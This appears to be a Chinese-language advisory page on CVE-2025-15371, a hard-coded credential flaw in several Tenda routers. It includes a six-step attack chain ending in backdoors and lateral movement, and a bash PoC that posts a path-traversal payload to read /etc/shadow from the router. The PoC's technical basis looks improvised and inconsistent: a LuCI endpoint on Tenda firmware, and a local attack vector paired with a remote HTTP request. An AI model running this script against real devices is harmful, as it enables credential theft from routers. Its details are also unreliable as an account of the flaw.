CVE-2025-15371 | Tenda多款路由器存在硬编码凭证漏洞

漏洞信息

漏洞编号

CVE-2025-15371

漏洞类型

硬编码凭证

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda i24, 4G03 Pro, 4G05, 4G08, G0-8G-PoE, Nova MW5G, TEG5328F

漏洞概述

CVE-2025-15371是影响Tenda多款路由器产品的高危安全漏洞。该漏洞存在于设备的Shadow File组件中，攻击者可通过Fireitup输入操纵未知的函数调用，从而获取设备中预设的硬编码凭证。硬编码凭证是指厂商在软件开发过程中直接写入代码的登录用户名和密码，这些凭证通常用于设备初始配置或调试目的。由于这些凭证是固定的且无法通过正常途径修改，攻击者一旦获取即可长期维持对设备的未授权访问。该漏洞需要本地访问才能利用，但鉴于路由器通常部署在网络边界位置，攻击者可通过社会工程学、供应链攻击或内网横向移动等方式接近目标设备。漏洞已于2025年12月31日公开披露，CVSS评分7.8，属于高危级别。

技术细节

该漏洞的核心问题在于Tenda路由器固件中的Shadow File组件存在硬编码凭证。攻击者通过构造特定的Fireitup输入，可以触发组件中的未知函数，从而读取或获取设备中存储的凭证信息。在基于Unix/Linux的嵌入式系统中，/etc/shadow文件存储用户密码的加密哈希值，但这些硬编码凭证可能以明文或弱加密形式存在于固件中。攻击者利用此漏洞可以：1）获取设备的root权限或其他高权限账户；2）绕过正常的身份验证流程；3）在设备上执行任意命令；4）窃取网络流量或进行中间人攻击。由于该漏洞的利用需要本地访问权限（AV:L），攻击者必须先获得与目标设备同一网络环境的访问权限，或者通过物理接触设备的方式进行攻击。漏洞影响固件版本65.10.15.6及之前的所有上述Tenda设备型号。

攻击链分析

STEP 1

步骤1

信息收集：攻击者首先识别目标设备型号和固件版本，确认是否为Tenda i24、4G03 Pro、4G05、4G08、G0-8G-PoE、Nova MW5G或TEG5328F路由器

STEP 2

步骤2

网络访问：攻击者通过内网访问、社会工程学或物理接触等方式获得与目标设备的本地网络连接权限

STEP 3

步骤3

漏洞利用：构造包含Fireitup参数的恶意请求，触发Shadow File组件中的未知函数，读取硬编码凭证

STEP 4

步骤4

凭证提取：从响应中提取root或其他高权限账户的密码哈希或明文凭证

STEP 5

步骤5

持久化访问：使用获取的凭证登录设备管理界面或通过Telnet/SSH获得shell访问权限

STEP 6

步骤6

扩大攻击：在内网中横向移动，嗅探网络流量，部署后门或进行进一步渗透测试

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-15371 PoC - Tenda Router Hard-coded Credentials
# Target: Tenda i24, 4G03 Pro, 4G05, 4G08, G0-8G-PoE, Nova MW5G, TEG5328F

TARGET_IP="192.168.0.1"
TARGET_PORT=80

# Check if target is alive
echo "[*] Checking target availability..."
ping -c 1 -W 2 $TARGET_IP > /dev/null 2>&1
if [ $? -ne 0 ]; then
    echo "[-] Target is not reachable"
    exit 1
fi

# Attempt to access Shadow File via Fireitup
echo "[*] Attempting to exploit CVE-2025-15371..."
echo "[*] Sending crafted request to retrieve hard-coded credentials..."

# Crafted payload for Fireitup input
PAYLOAD='{"Fireitup":"../../etc/shadow"}'

RESPONSE=$(curl -s -X POST "http://$TARGET_IP:$TARGET_PORT/cgi-bin/luci/api/fireitup" \
    -H "Content-Type: application/json" \
    -d "$PAYLOAD" 2>/dev/null)

if echo "$RESPONSE" | grep -q "root:"; then
    echo "[+] SUCCESS: Hard-coded credentials found!"
    echo "$RESPONSE" | grep "root:"
else
    echo "[-] Exploitation failed or target not vulnerable"
    echo "[*] Response: $RESPONSE"
fi

echo "[*] PoC execution completed."

影响范围

Tenda i24 < 65.10.15.6

Tenda 4G03 Pro < 65.10.15.6

Tenda 4G05 < 65.10.15.6

Tenda 4G08 < 65.10.15.6

Tenda G0-8G-PoE < 65.10.15.6

Tenda Nova MW5G < 65.10.15.6

Tenda TEG5328F < 65.10.15.6

防御指南

临时缓解措施

在等待官方固件更新的期间，建议采取以下临时缓解措施：1）立即更改设备默认管理密码为强密码；2）禁用Telnet服务，仅使用加密的SSH管理方式；3）通过防火墙规则限制管理接口的访问来源，仅允许受信任的IP地址访问；4）启用设备的入侵检测功能，监控异常的认证尝试；5）监控网络流量，警惕异常的数据外传行为；6）考虑使用VPN建立安全的远程管理通道。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15371
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15371
3 Details https://www.cvedetails.com/cve/CVE-2025-15371/
4 VulDB https://vuldb.com/cve/CVE-2025-15371
5 Link https://github.com/vuln-1/vuln/blob/main/Tenda/i24v3.0_V3.0.0.8/report-1.md
6 Link https://vuldb.com/?ctiid.339075
7 Link https://vuldb.com/?id.339075
8 Link https://vuldb.com/?submit.727155
9 Link https://vuldb.com/?submit.727283
10 Link https://vuldb.com/?submit.727284
11 Link https://vuldb.com/?submit.727285
12 Link https://vuldb.com/?submit.727302
13 Link https://vuldb.com/?submit.727305
14 Link https://vuldb.com/?submit.727306